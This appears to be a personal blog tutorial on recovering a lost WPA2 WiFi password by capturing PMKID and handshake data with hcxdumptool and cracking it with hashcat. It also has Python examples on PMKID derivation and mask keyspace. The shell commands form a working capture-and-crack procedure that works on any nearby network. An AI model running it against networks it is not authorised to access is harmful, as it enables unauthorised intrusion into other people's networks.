Recently I have been clumsy enough to lose the password of the shared WiFi. Unfortunately, as I did not have any means to retrieve it and had no access to the router, I had to get into it differently.
Disclaimer: You can use this knowledge for good things or bad things. In this blog post, we are speaking about retrieving access to your network. If you decide to use that knowledge for other purposes, this is merely your decision.
Today, we are going to see how to access a WiFi network when you have lost its password. It is one of the ways. There are many. This one worked pretty well because it is quick to obtain the initial data before trying to brute force the password.
For this article we are going to need:
- Git
- A Linux distribution ♥
- hcxdumptool
- hashcat
- hcxtools
- A good computer (or a lot of coffee)
Introduction
We have two tools, hcxdumptool and hashcat. The first one will listen to the network and capture packets. From these packets, we are going to get hashed data, and hashcat is going to help us brute force these hashed data.
The first way to obtain these data is to listen to someone connecting to the router. The authentication has four steps, and we know their structure.
An alternative way is an optional field, the RSN (Robust Security Network) PMKID.
The PMKID (Pairwise Master Key Identifier) contains a hash of the PMK (Pairwise Master Key) and it is what we want to retrieve.
In both cases, it is not possible to reverse a hash. Therefore, we are going to brute force the possibilities to obtain the same hash. When the two hashes match, it means that we found the password and that we can gain access to the network.
We don't try all the possibilities by asking the router. The brute force operation is done locally. Therefore the router is not impacted by that action.
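How the PMKID depends on the password, as an added example that is not part of the original post: the PMK is PBKDF2-HMAC-SHA1 of the passphrase salted with the SSID, and the PMKID is an HMAC-SHA1 over public values keyed with that PMK. Everything except the passphrase is visible on the air, which is why a guess can be checked locally and why the strength of the passphrase is the only protection. The SSIDs, MAC addresses and passphrase below are constructed sample values.

```python
import hashlib
import hmac

PBKDF2_ROUNDS = 4096  # fixed by WPA2-PSK; the only work factor protecting the passphrase


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ROUNDS, 32)


def derive_pmkid(pmk: bytes, ap_mac: str, client_mac: str) -> bytes:
    """PMKID = HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC), first 16 bytes."""
    label = b"PMK Name" + bytes.fromhex(ap_mac) + bytes.fromhex(client_mac)
    return hmac.new(pmk, label, hashlib.sha1).digest()[:16]


def pmkid_for(passphrase: str, ssid: str, ap_mac: str, client_mac: str) -> str:
    """Hex PMKID for one passphrase/network/client combination."""
    return derive_pmkid(derive_pmk(passphrase, ssid), ap_mac, client_mac).hex()


# Constructed sample values, not taken from the capture in this post.
# MACs are written as bare hex, the way hcxdumptool prints them.
AP_MAC, CLIENT_MAC = "020000000001", "020000000002"

if __name__ == "__main__":
    # Same passphrase on two SSIDs: the SSID is the salt, so the PMKIDs differ
    # and a table precomputed for one network name is useless for another.
    for ssid in ("HomeLab-Example", "HomeLab-Guest"):
        print(ssid, pmkid_for("constructed-sample-passphrase", ssid, AP_MAC, CLIENT_MAC))
```
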
Installation
I am used to copying the source code of software I want to work with, and that is not necessary for the system to run, into the /opt/ folder. Feel free to do the following operations in another folder, like your home folder, if you feel like it.
```sh
# Move to the folder you want to keep the sources in.
cd /opt/
# Let's retrieve the source code of the tools we need.
git clone https://github.com/ZerBea/hcxdumptool
git clone https://github.com/hashcat/hashcat
git clone https://github.com/ZerBea/hcxtools.git
# Let's build them and install them
(cd hcxdumptool/ && make && sudo make install)
(cd hashcat/ && make && sudo make install)
(cd hcxtools/ && make && sudo make install)
```
Congratulations, you are now weaponized to try to access any WiFi network, but of course, we are always going to use it on the network that we own.
Preparing the network interface
We need to prepare the network interface to monitor the network and be used by hcxdumptool.
During this phase you will lose internet. This blog is a PWA and its content should be accessible offline. Therefore, if you are lost, please come back here!
First, let's find your WiFi interface:
```shell
ifconfig | grep wl
wlp1s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
```
Here we can see that the interface is named wlp1s0.
We need to know whether some software is going to interfere. To find out, you can just run hcxdumptool on the interface like this:
```shell
sudo hcxdumptool -i wlp1s0
```
If you see lines similar to:
```
initialization...
warning: NetworkManager is running with pid 19085
warning: wpa_supplicant is running with pid 19012
```
You need to deactivate the services, in my case:
```shell
sudo service wpa_supplicant stop
sudo service NetworkManager stop
```
Now we are going to put it in monitor mode.
```shell
# Set interface down
sudo ip link set wlp1s0 down
sudo iwconfig wlp1s0 mode monitor
sudo ip link set wlp1s0 up
```
From now on, you should not have internet anymore. If at any moment you wish to stop the procedure and restore the card to its normal state without having to reboot, simply execute:
```shell
sudo ip link set wlp1s0 down
sudo iwconfig wlp1s0 mode managed
sudo ip link set wlp1s0 up
sudo service wpa_supplicant start
sudo service NetworkManager start
```
Getting the password
Now we are going to capture the packets we need, and we are also going to do the brute force. These operations are going to leave some files behind, so I would recommend moving to the /tmp/ folder.
```shell
cd /tmp/
```
Let's capture packets. It is possible to filter the listening, but in our case we are going to listen to all frequencies and do the filtering later.
If you know which channel to listen to, you can specify it with the -c option.
If you want to look at the networks and their channels you can run:
```shell
sudo hcxdumptool -i wlp1s0 --do_rcascan
```
```shell
# Full spectrum
sudo hcxdumptool -o capture.pcapng -i wlp1s0
# Knowing the network is on channel 10
sudo hcxdumptool -o capture.pcapng -i wlp1s0 -c 10
```
You should see something like:
```
initialization...

start capturing (stop with ctrl+c)
INTERFACE................: wlp1s0
ERRORMAX.................: 100 errors
FILTERLIST...............: 0 entries
MAC CLIENT...............: e8041029998e
MAC ACCESS POINT.........: 000eef9848db (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 64629
ANONCE...................: 5128b8228c2be3c383be6615f4b81f01d168bda5389f3b74329c97cf1fa6baef

INFO: cha=11, rx=2642, rx(dropped)=1533, tx=245, powned=3, err=0
```
Here the important information is the powned=3 value. It means that we have 3 networks that are vulnerable to our maneuver.
Let's take a tea for the next 10 minutes and press ctrl+alt+c (the capture banner above lists ctrl+c as the stop key).
Once done, we are going to extract from the capture the hashed data we can use for cracking the password.
```shell
sudo hcxpcaptool capture.pcapng -z capture.16800 -o capture.2500 --network-out=network_hash_name
```
The -z is to extract the PMKID and the -o is to extract authentication from others.
This will produce three files:
- capture.16800
- capture.2500
- network_hash_name
To know if the network you want to retrieve the password for is vulnerable, there are two steps:
First check if the name of the network is not in the capture.2500 file:
```shell
wlanhcxinfo -i capture.2500 -a -s -e | grep -a <name of the network>
```
The second step, if you didn't find your network yet, is to cat the network_hash_name and match the corresponding hash to the capture.16800 file.
For example:
```shell
cat network_hash_name
```
A list of the type hash:network name will appear. If the hash corresponding to your network is in the capture.16800 file, it means that you will be able to attack it.
Easiest way to check without damaging your precious eyes:
```shell
cat capture.16800 | grep <hash>
```
If it is there, congratulations, let's run the brute force and flex our GPUs. If not, it means that the PMKID method is probably not possible. Therefore the only solution is to run hcxdumptool longer and wait for someone to connect to the access point.
If, like me, you have an Android phone with the WiFi password registered (but you can't retrieve it, thank you Android), you can connect, and it will significantly speed up the process.
Unfortunately, I only have a laptop with an Intel GPU, and therefore the process is prolonged. Intel GPUs and OpenCL also have troubles, and if you are in the same case, you are going to have to deactivate securities (sounds fun, doesn't it?).
WARNING: If you receive a message about the self test not working with an Intel GPU/CPU, you need to install the Intel OpenCL runtime. Don't try to deactivate the self test; it will not return any result in the end.
To install the Intel compute runtime, here are the instructions you can find on their page:
```shell
mkdir neo
cd neo
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-gmmlib_19.2.3_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-igc-core_1.0.10-2306_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-igc-opencl_1.0.10-2306_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-opencl_19.29.13530_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-ocloc_19.29.13530_amd64.deb
sudo dpkg -i *.deb
```
In my specific case, I recall the start of the password. So I used a brute force approach trying digits after ibiza131...
Now, based on which file contains your network (the mask is quoted so the shell does not treat ? as a wildcard):
```shell
# 2500
hashcat -m 2500 -a 3 capture.2500 'ibiza131?d?d?d' --force --increment
# 16800
hashcat -m 16800 -a 3 capture.16800 'ibiza131?d?d?d' --force --increment
```
Here ?d means a digit, and --increment means it will try with various lengths, adding one extra character after exhausting the previous possibilities.
You will see something resembling:
```
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: capture.2500
Time.Started.....: Tue Jul 30 01:05:07 2019 (18 secs)
Time.Estimated...: Tue Jul 30 01:05:25 2019 (0 secs)
Guess.Mask.......: ibiza131?d?d?d?d?d [13]
Guess.Queue......: 6/7 (85.71%)
Speed.#1.........: 5435 H/s (0.29ms) @ Accel:16 Loops:4 Thr:256 Vec:1
Recovered........: 1/2 (50.00%) Digests, 1/2 (50.00%) Salts
Progress.........: 200000/200000 (100.00%)
Rejected.........: 0/200000 (0.00%)
Restore.Point....: 100000/100000 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1
Candidates.#1....: ibiza13134373 -> ibiza13173737
```
Here you can see that we have recovered at least one.
You can check the value in the hashcat potfile:
```shell
cat ~/.hashcat/hashcat.potfile
```
If I didn't recall the password at all, I could have done a pure brute force of the type:
```shell
# 2500
hashcat -m 2500 -a 3 capture.2500 '?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a' --force --increment
# 16800
hashcat -m 16800 -a 3 capture.16800 '?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a' --force --increment
```
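To judge how well a passphrase holds up against the two kinds of mask shown in this post, the added example below (not code from the original post or from hashcat) counts the candidates a mask covers and divides by a guess rate. It assumes only hashcat's built-in charsets, and that candidates outside the 8 to 63 character range of a WPA passphrase are never tried; the function names are made up for this illustration.

```python
# Sizes of hashcat's built-in mask charsets (?l ?u ?d ?h ?H ?s ?a ?b).
CHARSET_SIZES = {"l": 26, "u": 26, "d": 10, "h": 16, "H": 16, "s": 33, "a": 95, "b": 256}
WPA_MIN_LEN, WPA_MAX_LEN = 8, 63  # valid WPA passphrase lengths


def mask_positions(mask: str) -> list:
    """Return the number of possible characters at each position of a mask."""
    sizes, i = [], 0
    while i < len(mask):
        if mask[i] != "?":
            sizes.append(1)  # literal character
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        token = mask[i + 1]
        if token == "?":
            sizes.append(1)  # '??' is a literal question mark
        elif token in CHARSET_SIZES:
            sizes.append(CHARSET_SIZES[token])
        else:
            raise ValueError(f"unsupported charset ?{token}")
        i += 2
    return sizes


def keyspace(mask: str, increment: bool = False) -> int:
    """Candidates of valid WPA length; with increment, summed over every prefix."""
    sizes = mask_positions(mask)
    lengths = range(1, len(sizes) + 1) if increment else [len(sizes)]
    total = 0
    for n in lengths:
        if WPA_MIN_LEN <= n <= WPA_MAX_LEN:
            count = 1
            for size in sizes[:n]:
                count *= size
            total += count
    return total


def seconds_to_exhaust(mask: str, hashes_per_second: float, increment: bool = False) -> float:
    """Worst-case time to try every candidate against a single network."""
    return keyspace(mask, increment) / hashes_per_second
```

At the 5435 H/s shown in the status output, the known-prefix mask with five digits is exhausted in about 18 seconds, while the fifteen-position ?a mask would take far longer than any realistic time frame: a passphrase with no guessable prefix is what makes the difference.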
In this case you can also do a dictionary attack.
```shell
# 2500
hashcat -m 2500 -a 0 capture.2500 --force my_list_of_passwords
# 16800
hashcat -m 16800 -a 0 capture.16800 --force my_list_of_passwords
```
You can find many lists of passwords here.
Okay that's all folks. Now that I got back internet I can post this article. Peace out!